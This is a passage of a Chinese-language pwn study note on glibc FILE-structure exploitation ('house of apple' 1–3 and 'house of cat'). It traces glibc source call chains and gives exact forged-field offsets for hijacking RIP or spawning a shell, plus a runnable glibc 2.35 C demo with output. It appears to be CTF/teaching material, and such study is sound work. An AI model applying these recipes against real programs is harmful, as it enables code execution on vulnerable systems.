        • ef_on -> on_exit注册的函数
        • 其他类型忽略
      • 若执行期间有新回调注册 → 回到链表开头
      • 释放动态分配的回调节点
      • run_list_atexit = true,则执行__libc_atexit钩子:默认为_IO_cleanup()
    • _exit(status)
  • 内核:彻底终止进程

house of apple2 | house of cat

  • 漏洞产生:_wide_data结构中有一个类似vtable_wide_vtable指向_IO_jump_t结构,与vtable相同,对glibc中也定义了调用_wide_vtable中函数的宏,其中在 glibc 中真正使用到的有_IO_WSETBUF、_IO_WUNDERFLOW、_IO_WDOALLOCATE,但与vtable不同的是这三个宏均缺少对_wide_vtable位置的检查 _IO_OVERFLOW
    #define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
    #define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    # define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
    _IO_WOVERFLOW
    #define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
    #define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
    #define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)
    #define _IO_WIDE_JUMPS(THIS) _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

_IO_wfile_overflow

  • 调用链
  1. _IO_wfile_overflow
    wint_t
    _IO_wfile_overflow (FILE *f, wint_t wch)
    {
    if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
    f->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    /* If currently reading or no buffer allocated. */
    if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)
    {
    /* Allocate a buffer if needed. */
    if (f->_wide_data->_IO_write_base == 0)
    {
    _IO_wdoallocbuf (f);// 需要走到这里
    // ......
    }
    }
    }
    满足条件:
  • f->_flags & _IO_NO_WRITES == 0
  • f->_flags & _IO_CURRENTLY_PUTTING == 0
  • f->_wide_data->_IO_write_base == 0
  1. _IO_wdoallocbuf
    void
    _IO_wdoallocbuf (FILE *fp)
    {
    if (fp->_wide_data->_IO_buf_base)
    return;
    if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)// _IO_WXXXX调用
    return;
    _IO_wsetb (fp, fp->_wide_data->_shortbuf,
    fp->_wide_data->_shortbuf + 1, 0);
    }
    libc_hidden_def (_IO_wdoallocbuf)
    满足条件:
  • fp->_wide_data->_IO_buf_base == 0
  • fp->_flags & _IO_UNBUFFERED == 0
  1. _IO_WDOALLOCATE

  2. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

综上所述: * _flags设置为~(2 | 0x8 | 0x800),如果不需要控制rdi,设置为0即可;如果需要获得shell,可设置为;sh; * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_overflow即可 * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_write_base设置为0,即满足*(A + 0x18) = 0 * _wide_data->_IO_buf_base设置为0,即满足*(A + 0x30) = 0 * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

_IO_wfile_underflow_mmap

  • 调用链
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;

    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp);// 需要走到这里
    }
    //......
    }
    满足条件:
  • fp->_flags & _IO_NO_READS == 0
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_wide_data->_IO_buf_base == NULL,fp->_wide_data->_IO_save_base == NULL
  1. _IO_wdoallocbuf

  2. _IO_WDOALLOCATE

  3. *(fp->_wide_data->_wide_vtable + 0x68)(fp)

综上所述: * _flags设置为~4,如果不需要控制rdi,设置为0即可;如果需要获得shell,可设置为;sh; * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_overflow_mmap即可 * _IO_read_ptr < _IO_read_end,即满足*(fp + 8) < *(fp + 0x10) * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end,即满足*A >= *(A + 8) * _wide_data->_IO_buf_base设置为0,即满足*(A + 0x30) = 0 * _wide_data->_IO_save_base设置为0或者合法的可被free的地址,即满足*(A + 0x40) = 0 * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

_IO_wdefault_xsgetn

  • 调用链
  1. _IO_wdefault_xsgetn
    size_t
    _IO_wdefault_xsgetn (FILE *fp, void *data, size_t n)
    {
    size_t more = n;
    wchar_t *s = (wchar_t*) data;
    for (;;)
    {
    /* Data available. */
    ssize_t count = (fp->_wide_data->_IO_read_end
    - fp->_wide_data->_IO_read_ptr);
    if (count > 0)
    {
    if ((size_t) count > more)
    count = more;
    if (count > 20)
    {
    s = __wmempcpy (s, fp->_wide_data->_IO_read_ptr, count);
    fp->_wide_data->_IO_read_ptr += count;
    }
    else if (count <= 0)
    count = 0;
    else
    {
    wchar_t *p = fp->_wide_data->_IO_read_ptr;
    int i = (int) count;
    while (--i >= 0)
    *s++ = *p++;
    fp->_wide_data->_IO_read_ptr = p;
    }
    more -= count;
    }
    if (more == 0 || __wunderflow (fp) == WEOF)
    break;
    }
    return n - more;
    }
    libc_hidden_def (_IO_wdefault_xsgetn)
    满足条件:
  • 由于more是第三个参数,所以不能为0,即rdx寄存器不为0
  • 直接设置fp->_wide_data->_IO_read_ptr == fp->_wide_data->_IO_read_end,使得count0,不进入if分支
  1. __wunderflow
wint_t
__wunderflow (FILE *fp)
{
if (fp->_mode < 0 || (fp->_mode == 0 && _IO_fwide (fp, 1) != 1))
return WEOF;

if (fp->_mode == 0)
_IO_fwide (fp, 1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_wget_mode (fp) == EOF)
return WEOF;
// ......
}

满足条件: * 设置fp->mode > 0,并且fp->_flags & _IO_CURRENTLY_PUTTING != 0

  1. _IO_switch_to_wget_mode
int
_IO_switch_to_wget_mode (FILE *fp)
{
if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF) // 需要走到这里
return EOF;
// .....
}

满足条件: * fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base

  1. _IO_WOVERFLOW

  2. *(fp->_wide_data->_wide_vtable + 0x18)(fp)

综上所述: * _flags设置为0x800 * vtable设置为_IO_wstrn_jumps/_IO_wmem_jumps/_IO_wstr_jumps地址(加减偏移),使其能成功调用_IO_wdefault_xsgetn即可 * _mode设置为大于0,即满足*(fp + 0xc0) > 0 * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr == _wide_data->_IO_read_end,即满足*A == *(A + 8) * _wide_data->_IO_write_ptr > _wide_data->_IO_write_base,即满足*(A + 0x20) > *(A + 0x18) * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

_IO_wfile_seekoff(house of cat)

  • 调用链
  1. _IO_wfile_seekoff
    off64_t 
    _IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode) {
    off64_t result;
    off64_t delta, new_offset;
    long int count;
    /*短路变成一个单独的功能。 我们不想混合任何功能,也不想触及 FILE 对象内部的任何内容。*/
    if (mode == 0)
    return do_ftell_wide (fp);

    ...
    bool was_writing = ((fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base) || _IO_in_put_mode (fp));
    /*刷新未写入的字符。(如果我们在缓冲区内查找,这可能会执行不必要的写入。但是为了能够切换到阅读,我们需要将 egptr 设置为 pptr。 这在当前的设计中是无法做到的,它假设 file_ptr() 是 eGptr。 无论如何,由于我们可能在close()时最终刷新,因此没有太大区别。FIXME:模拟内存映射文件。*/
    if (was_writing && _IO_switch_to_wget_mode (fp))
    return WEOF;
    满足条件:
  • _mode不为0
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base或 (fp)->_flags & 0x0800 != 0
  1. _IO_switch_to_wget_mode 满足条件:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  1. _IO_WOVERFLOW

  2. *(fp->_wide_data->_wide_vtable + 0x18)(fp)

综上所述: * _flags设置为~0x8,如果不能保证_lock指向可读写内存则_flags |= 0x8000 * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_seekoff即可 * _mode设置为大于0,即满足*(fp + 0xc0) > 0 * _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr > _wide_data->_IO_read_end,即满足*A > *(A + 8) * _wide_data->_IO_write_ptr > _wide_data->_IO_write_base,即满足*(A + 0x20) > *(A + 0x18) * _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B * _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

house of apple1

  • 核心:在堆上伪造一个_IO_FILE结构体并已知其地址为A,将A + 0xd8(vtable)替换为_IO_wstrn_jumps地址,A + 0xa0(_wide_data)设置为B,并设置其他成员以便能调用到_IO_OVERFLOWexit函数则会一路调用到_IO_wstrn_overflow函数,并将BB + 0x30的地址区域的内容都替换为A + 0xf0或者A + 0x1f0
    static wint_t
    _IO_wstrn_overflow (FILE *fp, wint_t c)
    {
    _IO_wstrnfile *snf = (_IO_wstrnfile *) fp;
    if (fp->_wide_data->_IO_buf_base != snf->overflow_buf)
    {
    _IO_wsetb (fp, snf->overflow_buf,
    snf->overflow_buf + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)), 0);
    //只要控制了fp->_wide_data,就可以控制从fp->_wide_data开始一定范围内的内存的值,也就等同于任意地址写已知地址。
    fp->_wide_data->_IO_write_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_base = snf->overflow_buf;
    fp->_wide_data->_IO_read_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_read_end = (snf->overflow_buf
    + (sizeof (snf->overflow_buf)
    / sizeof (wchar_t)));
    }

    fp->_wide_data->_IO_write_ptr = snf->overflow_buf;
    fp->_wide_data->_IO_write_end = snf->overflow_buf;
    return c;
    }
  • 有时候需要绕过_IO_wsetb函数里面的free
    #define _IO_FLAGS2_USER_WBUF 8
    //设置f->_flags2为8即可绕过
    void
    _IO_wsetb (FILE *f, wchar_t *b, wchar_t *eb, int a)
    {
    if (f->_wide_data->_IO_buf_base && !(f->_flags2 & _IO_FLAGS2_USER_WBUF))
    free (f->_wide_data->_IO_buf_base); // 其不为0的时候不要执行到这里
    f->_wide_data->_IO_buf_base = b;
    f->_wide_data->_IO_buf_end = eb;
    if (a)
    f->_flags2 &= ~_IO_FLAGS2_USER_WBUF;
    else
    f->_flags2 |= _IO_FLAGS2_USER_WBUF;
    }

demo

#2.35-0ubuntu3
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
#include<unistd.h>
#include <string.h>

void main()
{
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setvbuf(stderr, 0, 2, 0);
    puts("[*] allocate a 0x100 chunk");
    size_t *p1 = malloc(0xf0);
    size_t *tmp = p1;
    size_t old_value = 0x1122334455667788;
    for (size_t i = 0; i < 0x100 / 8; i++)
    {
        p1[i] = old_value;
    }
    puts("===========================old value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================old value=======================");
    size_t puts_addr = (size_t)&puts;
    printf("[*] puts address: %p\n", (void *)puts_addr);
    size_t stderr_write_ptr_addr = puts_addr + 0x1997f8;
    printf("[*] stderr->_IO_write_ptr address: %p\n", (void *)stderr_write_ptr_addr);
    size_t stderr_flags2_addr = puts_addr + 0x199844;
    printf("[*] stderr->_flags2 address: %p\n", (void *)stderr_flags2_addr);
    size_t stderr_wide_data_addr = puts_addr + 0x199870;
    printf("[*] stderr->_wide_data address: %p\n", (void *)stderr_wide_data_addr);
    size_t sdterr_vtable_addr = puts_addr + 0x1998a8;
    printf("[*] stderr->vtable address: %p\n", (void *)sdterr_vtable_addr);
    size_t _IO_wstrn_jumps_addr = puts_addr + 0x194ef0;
    printf("[*] _IO_wstrn_jumps address: %p\n", (void *)_IO_wstrn_jumps_addr);
    puts("[+] step 1: change stderr->_IO_write_ptr to -1");
    *(size_t *)stderr_write_ptr_addr = (size_t)-1;
    puts("[+] step 2: change stderr->_flags2 to 8");
    *(size_t *)stderr_flags2_addr = 8;
    puts("[+] step 3: replace stderr->_wide_data with the allocated chunk");
    *(size_t *)stderr_wide_data_addr = (size_t)p1;
    puts("[+] step 4: replace stderr->vtable with _IO_wstrn_jumps");
    *(size_t *)sdterr_vtable_addr = (size_t)_IO_wstrn_jumps_addr;
    puts("[+] step 5: call fcloseall and trigger house of apple");
    fcloseall();
    tmp = p1;
    puts("===========================new value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================new value=======================");
}
输出结果:
[*] allocate a 0x100 chunk
===========================old value=======================
[0x56142e11b2a0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2b0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2c0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2d0]: 0x1122334455667788 0x1122334455667788
===========================old value=======================
[*] puts address: 0x7cb7d0280ed0
[*] stderr->_IO_write_ptr address: 0x7cb7d041a6c8
[*] stderr->_flags2 address: 0x7cb7d041a714
[*] stderr->_wide_data address: 0x7cb7d041a740
[*] stderr->vtable address: 0x7cb7d041a778
[*] _IO_wstrn_jumps address: 0x7cb7d0415dc0
[+] step 1: change stderr->_IO_write_ptr to -1
[+] step 2: change stderr->_flags2 to 8
[+] step 3: replace stderr->_wide_data with the allocated chunk
[+] step 4: replace stderr->vtable with _IO_wstrn_jumps
[+] step 5: call fcloseall and trigger house of apple
===========================new value=======================
[0x56142e11b2a0]: 0x00007cb7d041a790 0x00007cb7d041a890
[0x56142e11b2b0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2c0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2d0]: 0x00007cb7d041a790 0x00007cb7d041a890
===========================new value=======================

总结:在只给了1largebin attack的前提下,能利用_IO_wstrn_overflow函数将任意地址空间上的值修改为一个已知地址,并且这个已知地址通常为堆地址。那么,当我们伪造两个甚至多个_IO_FILE结构体,并将这些结构体通过chain字段串联起来就能进行组合利用

修改tcache线程(< 2.37)

  • 伪造至少两个_IO_FILE结构体
  • 第一个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_wstrn_overflow函数修改tcache全局变量为已知值,也就控制了tcache bin的分配
  • 第二个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_str_overflow中的malloc函数任意地址分配,并使用memcpy使得能够任意地址写任意值
  • 利用两次任意地址写任意值修改pointer_guardIO_accept_foreign_vtables的值绕过_IO_vtable_check函数的检测(或者利用一次任意地址写任意值修改libc.got里面的函数地址,很多IO流函数调用strlen/strcpy/memcpy/memset等都会调到libc.got里面的函数)
  • 利用一个_IO_FILE,随意伪造vtable劫持程序控制流即可

修改mp_结构体

  • 伪造至少两个_IO_FILE结构体
  • 第一个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_wstrn_overflow函数修改mp_.tcache_bins为很大的值,使得很大的chunk也通过tcachebin去管理
  • 接下来的过程与上面的思路是一样的

修改pointer_guard线程变量+house of emma

  • 伪造两个_IO_FILE结构体
  • 第一个_IO_FILE结构体执行_IO_OVERFLOW的时候,利用_IO_wstrn_overflow函数修改tls结构体pointer_guard的值为已知值
  • 第二个_IO_FILE结构体用来做house of emma利用即可控制程序执行流

修改global_max_fast全局变量

修改掉这个变量后,直接释放超大的chunk,去覆盖掉point_guard或者tcache变量

house of apple3

FILE结构体中有一个成员struct _IO_codecvt *_codecvt;,偏移为0x98。该结构体参与宽字符的转换工作,结构体相关定义如下:

struct _IO_codecvt
{
_IO_iconv_t __cd_in;
_IO_iconv_t __cd_out;
};

typedef struct
{
struct __gconv_step *step;
struct __gconv_step_data step_data;
} _IO_iconv_t;

struct __gconv_step
{
struct __gconv_loaded_object *__shlib_handle;
const char *__modname;

/* For internal use by glibc. (Accesses to this member must occur
when the internal __gconv_lock mutex is acquired). */
int __counter;

char *__from_name;
char *__to_name;

__gconv_fct __fct;
__gconv_btowc_fct __btowc_fct;
__gconv_init_fct __init_fct;
__gconv_end_fct __end_fct;

/* Information about the number of bytes needed or produced in this
step. This helps optimizing the buffer sizes. */
int __min_needed_from;
int __max_needed_from;
int __min_needed_to;
int __max_needed_to;

/* Flag whether this is a stateful encoding or not. */
int __stateful;

void *__data; /* Pointer to step-local data. */
};

struct __gconv_step_data
{
unsigned char *__outbuf; /* Output buffer for this step. */
unsigned char *__outbufend; /* Address of first byte after the output
buffer. */

/* Is this the last module in the chain. */
int __flags;

/* Counter for number of invocations of the module function for this
descriptor. */
int __invocation_counter;

/* Flag whether this is an internal use of the module (in the mb*towc*
and wc*tomb* functions) or regular with iconv(3). */
int __internal_use;

__mbstate_t *__statep;
__mbstate_t __state; /* This element must not be used directly by
any module; always use STATEP! */
};
house of apple3的利用主要关注以下三个函数:__libio_codecvt_out__libio_codecvt_in__libio_codecvt_length。三个函数的利用点都差不多,以__libio_codecvt_in为例,源码分析如下:
enum __codecvt_result
__libio_codecvt_in (struct _IO_codecvt *codecvt, __mbstate_t *statep,
const char *from_start, const char *from_end,
const char **from_stop,
wchar_t *to_start, wchar_t *to_end, wchar_t **to_stop)
{
enum __codecvt_result result;
// gs 源自第一个参数
struct __gconv_step *gs = codecvt->__cd_in.step;
int status;
size_t dummy;
const unsigned char *from_start_copy = (unsigned char *) from_start;

codecvt->__cd_in.step_data.__outbuf = (unsigned char *) to_start;
codecvt->__cd_in.step_data.__outbufend = (unsigned char *) to_end;
codecvt->__cd_in.step_data.__statep = statep;

__gconv_fct fct = gs->__fct;
#ifdef PTR_DEMANGLE
// 如果gs->__shlib_handle不为空,则会用__pointer_guard去解密
// 这里如果可控,设置为NULL即可绕过解密
if (gs->__shlib_handle != NULL)
PTR_DEMANGLE (fct);
#endif
// 这里有函数指针调用
// 这个宏就是调用fct(gs, ...)
status = DL_CALL_FCT (fct,
(gs, &codecvt->__cd_in.step_data, &from_start_copy,
(const unsigned char *) from_end, NULL,
&dummy, 0, 0));
// ......
}
其中,__gconv_fctDL_CALL_FCT被定义为:
/* Type of a conversion function.  */
typedef int (*__gconv_fct) (struct __gconv_step *, struct __gconv_step_data *,
const unsigned char **, const unsigned char *,
unsigned char **, size_t *, int, int);

#ifndef DL_CALL_FCT
# define DL_CALL_FCT(fct, args) fct args
#endif
#### _IO_wfile_underflow

  • 调用链
  1. _IO_wfile_underflow

    wint_t
    _IO_wfile_underflow (FILE *fp)
    {
    struct _IO_codecvt *cd;
    enum __codecvt_result status;
    ssize_t count;

    /* C99 requires EOF to be "sticky". */

    // 不能进入这个分支
    if (fp->_flags & _IO_EOF_SEEN)
    return WEOF;
    // 不能进入这个分支
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // 不能进入这个分支
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    // 需要进入这个分支
    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr < fp->_IO_read_end)
    {
    /* There is more in the external. Convert it. */
    const char *read_stop = (const char *) fp->_IO_read_ptr;

    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;
    // 需要一路调用到这里
    status = __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    // ......
    }
    }

  2. __libio_codecvt_in

  3. DL_CALL_FCT

  4. gs = fp->_codecvt->__cd_in.step

  5. *(gs->__fct)(gs)

综上所述: * _flags设置为~(4 | 0x10) * vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_underflow即可 * fp->_IO_read_ptr < fp->_IO_read_end,即满足*(fp + 8) < *(fp + 0x10) * _wide_data保持默认,或者设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end,即满足*A >= *(A + 8) * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC。如果_wide_data也可控的话,rsi也能控制

_IO_wfile_underflow_mmap

  • 调用链
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;
    // 不能进入这个分支
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // 不能进入这个分支
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    // 最好不要进入这个分支
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    // 最好不要进入这个分支
    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp);// 需要走到这里
    }
    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;

    // 需要调用到这里
    __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    //......
    }
    满足条件:
  • fp->_flags & _IO_NO_READS == 0
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_buf_base != NULL
  1. __libio_codecvt_in

  2. DL_CALL_FCT

  3. gs = fp->_codecvt->__cd_in.step

  4. *(gs->__fct)(gs)

综上所述: * _flags设置为~4 * vtable设置为_IO_wfile_jumps_mmap地址(加减偏移),使其能成功调用_IO_wfile_underflow_mmap即可 * fp->_IO_read_ptr < fp->_IO_read_end,即满足*(fp + 8) < *(fp + 0x10) * _wide_data保持默认,或者设置为可控堆地址A,即满足*(fp + 0xa0) = A * _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end,即满足*A >= *(A + 8) * _wide_data->_IO_buf_base设置为非0,即满足*(A + 0x30) != 0 * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC,如果_wide_data也可控的话,rsi也能控制

_IO_wdo_write

  • 调用链
  1. _IO_new_file_sync
    int
    _IO_new_file_sync (FILE *fp)
    {
    ssize_t delta;
    int retval = 0;

    /* char* ptr = cur_ptr(); */
    if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF;//调用到这里
    //......
    }
    满足条件:
  • fp->_IO_write_ptr > fp->_IO_write_base
  1. _IO_do_flush
    #define _IO_do_flush(_f) \
    ((_f)->_mode <= 0 \
    ? _IO_do_write(_f, (_f)->_IO_write_base, \
    (_f)->_IO_write_ptr-(_f)->_IO_write_base) \
    : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base, \
    ((_f)->_wide_data->_IO_write_ptr \
    - (_f)->_wide_data->_IO_write_base)))
    满足条件:
  • fp->_mode > 0
  • 此时的第二个参数为fp->_wide_data->_IO_write_base
  • 第三个参数为fp->_wide_data->_IO_write_ptr - fp->_wide_data->_IO_write_base
  1. _IO_wdo_write
    int
    _IO_wdo_write (FILE *fp, const wchar_t *data, size_t to_do)
    {
    struct _IO_codecvt *cc = fp->_codecvt;

    // 第三个参数必须要大于0
    if (to_do > 0)
    {
    if (fp->_IO_write_end == fp->_IO_write_ptr
    && fp->_IO_write_end != fp->_IO_write_base)
    {// 不能进入这个分支
    if (_IO_new_do_write (fp, fp->_IO_write_base,
    fp->_IO_write_ptr - fp->_IO_write_base) == EOF)
    return WEOF;
    }

    // ......

    /* Now convert from the internal format into the external buffer. */
    // 需要调用到这里
    result = __libio_codecvt_out (cc, &fp->_wide_data->_IO_state,
    data, data + to_do, &new_data,
    write_ptr,
    buf_end,
    &write_ptr);
    //......
    }
    }
    满足条件:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  • fp->_IO_write_end == fp->_IO_write_ptr && fp->_IO_write_end != fp->_IO_write_base为假
  1. __libio_codecvt_out

  2. DL_CALL_FCT

  3. `gs = fp->_codecvt->__cd_out.step

  4. *(gs->__fct)(gs)

综上所述: * _flags设置为~4 * vtable设置为_IO_file_jumps地址(加减偏移),使其能成功调用_IO_new_file_sync即可 * _mode > 0,即满足(fp + 0xc0) > 0 * _IO_write_end != _IO_write_ptr或者_IO_write_end == _IO_write_base,即满足*(fp + 0x30) != *(fp + 0x28)或者*(fp + 0x30) == *(fp + 0x20) * _wide_data设置为堆地址,假设地址为A,即满足*(fp + 0xa0) = A * _wide_data->_IO_write_ptr >= _wide_data->_IO_write_base,即满足*(A + 0x20) >= *(A + 0x18) * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC,如果_wide_data也可控的话,rsi也能控制

_IO_wfile_sync

  • 调用链
  1. _IO_wfile_sync
    wint_t
    _IO_wfile_sync (FILE *fp)
    {
    ssize_t delta;
    wint_t retval = 0;

    /* char* ptr = cur_ptr(); */
    // 不要进入这个分支
    if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
    if (_IO_do_flush (fp))
    return WEOF;
    delta = fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end;
    // 需要进入到这个分支
    if (delta != 0)
    {
    /* We have to find out how many bytes we have to go back in the
    external buffer. */
    struct _IO_codecvt *cv = fp->_codecvt;
    off64_t new_pos;

    // 这里直接返回-1即可
    int clen = __libio_codecvt_encoding (cv);

    if (clen > 0)
    /* It is easy, a fixed number of input bytes are used for each
    wide character. */
    delta *= clen;
    else
    {
    /* We have to find out the hard way how much to back off.
    To do this we determine how much input we needed to
    generate the wide characters up to the current reading
    position. */
    int nread;
    size_t wnread = (fp->_wide_data->_IO_read_ptr
    - fp->_wide_data->_IO_read_base);
